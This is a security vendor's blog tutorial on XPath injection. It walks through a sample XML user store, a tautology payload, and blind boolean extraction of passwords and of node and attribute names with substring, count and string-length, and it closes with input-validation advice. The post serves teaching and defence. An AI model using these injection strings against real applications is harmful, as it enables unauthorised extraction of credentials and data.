Trustwave Government Solutions Attains StateRAMP Authorization. Learn More

Trustwave Government Solutions Attains StateRAMP Authorization. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Security
Unlock the full power of Microsoft Security
Offensive Security
Solutions to maximize your security ROI
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats

Be Off the Beaten XPath, Go Blind

XPath (XML Path Language) is a language used to query XML documents in order to extract data. XML files are commonly used to store information on the server and particularly configuration settings. There are some small application that would manipulate small portions of data often stored in XML files in order to avoid deploying a full database environment. In this case, the data stored is usually not very sensitive, but it can be more interesting when the application uses XML documents to store configuration data such as user settings. When the user-supplied input is directly used to build an XPath query without being validated, it can be possible to inject commands in the same way you exploit an SQL Injection flaw.

XPath Basics

Let's see a basic example on how Xpath works and how an application can navigate within the XML document to retrieve data. Consider an application that stores information about users in an XML file:

<users>
<user Id="1" FirstName="Chris" LastName="Travis" BirthDay="1990-12-22">
<login>ctravis</login>
<password>my$ecureP@ssw0rd</password>
<role>admin</role>
<email>ctravis@mycompany.com</email>
</user>
<user Id="2" FirstName="John" LastName="Rosewood" BirthDay="1977-03-19">
<login>jrosewood</login>
<password>s3cr3t$</password>
<role>operator</role>
<email>jrosewood@site.com</email>
</user>
<user Id="3" FirstName="Mark" LastName="Borgui" BirthDay="1997-10-03">
<login>mborgui</login>
<password>Ma@rkPa$$</password>
<role>user</role>
<email>mborgui@example.com</email>
</user>
</users>

Using XPath you can retrieve any information from within the document (attributes, node text, comments,...). For instance, to retrieve the email addresses of every user you can use the following query:

//users/user/email/text()

Result:

ctravis@mycompany.com
jrosewood@site.com
mborgui@example.com

To extract the BirthDay attribute value for every user:

//users/user/@BirthDay

Result:

1990-12-22
1977-03-19
1997-10-03

Remember that XPath syntax is case sensitive. This means the attribute "BirthDay" is different than the attribute "birthday"

To extract BirthDay attribute value of users with the "user" role:

//users/user[role/text()='user']/@BirthDay

Result:

1997-10-03

Injecting into XPath

So now that we understand how XPath works, let's see how an attacker could inject arbitrary command to retrieve information he should not be able to see. Consider a functionality that returns the birthday date of a given login and role. For example, if the user supplies login=jrosewood and role=operator, the application will build the following XPath query:

//users/user[login/text()='jrosewood' and role/text()='operator']/@BirthDay

Result:

1977-03-19

If the application is concatenating the user-supplied data to the XPath query string without any validation, it is possible to send the following values to manipulate the original query:

login=
role=' or 'a'='a

That will result in the following XPath query:

//users/user[login/text()='' and role/text()='' or 'a'='a']/@BirthDay

Result:

1990-12-22
1977-03-19
1997-10-03

The OR Boolean term is always true and the query will return all the BirthDay entries. Well, not very useful at this point, but let's see how we can extract more data.

As in SQL language, XPath has a substring function that can be used to extract a subset of characters from a string. For instance, the following query will test if the first character of John Rosewood's password is 'A':

login='jrosewood'
role=operator' and substring(password/text(),1,1)='A' and 'a'='a

The resulting XPath query is now:

//users/user[login/text()='jrosewood' and role/text()='operator' and substring(password/text(),1,1)='A' and 'a'='a']/@BirthDay

This should not return anything, because the last term of the AND sequence is false (the first character is not 'A'). If we test for the letter 's', this will return his BirthDay date, meaning the first character is 's'. Using this technique we are able to extract the full password by retrieving each character one by one.

role=operator' and substring(password/text(),2,1)='3' and 'a'='a
role=operator' and substring(password/text(),3,1)='c' and 'a'='a
role=operator' and substring(password/text(),4,1)='r' and 'a'='a
...

Well, but this means you already know the structure of the XML document, right? Not an issue, with XPath it is also possible to retrieve tag and attribute names.

Going blind

In a situation where no information about the XML document structure is known, XPath can still be used to extract data. For instance, to retrieve the root tag name, the following query can be used:

name(//*)

The name() function returns the name of the current node. As XML documents can only have one root element, one value will be returned. We can now extract the full name the same way we saw before:

role=operator' and substring(name(//*),1,1)='u' and 'a'='a
role=operator' and substring(name(//*),2,1)='s' and 'a'='a
role=operator' and substring(name(//*),3,1)='e' and 'a'='a
...

To retrieve the attribute value, the following query could be used:

name(//users/user[position()=1]/@*[1])

This one needs a bit more of explanation. It first navigates until the first <user> element under <users> and then retrieves its first attribute. The position() function returns the index position of the current node (we want the first one). As you may have noticed, there is a handy way to retrieve attribute by selecting its index position: @*[index]. Here, @*[1] means returning the first attribute. Let's use this with our attack payload:

role=operator' and substring(name(//users/user[position()=1]/@*[1]),1,1)='I' and 'a'='a
role=operator' and substring(name(//users/user[position()=1]/@*[1]),2,1)='d' and 'a'='a

Other useful functions can also be used:

  • count(): returns the number of nodes (useful to automate the extraction and iterate the position() value without going too far).For example, to retrieve the number of <user> elements:

     

    role=operator' and count(//users/user)=3 and 'a'='a

  • string-length(): returns the length of the string (useful to iterate the extraction of characters with substring()). To retrieve the first attribute name length of the first <user> node:

     

    role=operator' and string-length(name(//users/user[position()=1]/@*[1]))=2 and 'a'='a

Recommendations

XPath is a standard language, which means it is possible to use the same attack string for any implementation, which differs from SQL language. Also, unlike database objects, it is not possible to restrict the access to parts of the XML document. Once the application is authorized to read an XML file, it can access any data within it.

To protect the application against XPath Injection attacks, every user-supplied input must be validated before being used in an XPath query. Unlike SQL, there is no Parameterized Queries available for XPath. The best way is to use "Exact Match" validation, where inputs are compared to a list of known good values (i.e. states or zip code). If not possible, use a "White List" validation to only accept the known good characters. Basically, only alphanumeric characters should be authorized. At least, the following special characters must be rejected:

/ ( ) , = ' [ ] * : and all whitespace

Remember to always reject the query, sending a message back to the user specifying the correct format. Never try to sanitize or substitute the unwanted characters.

ABOUT TRUSTWAVE

Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.

Latest Intelligence

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo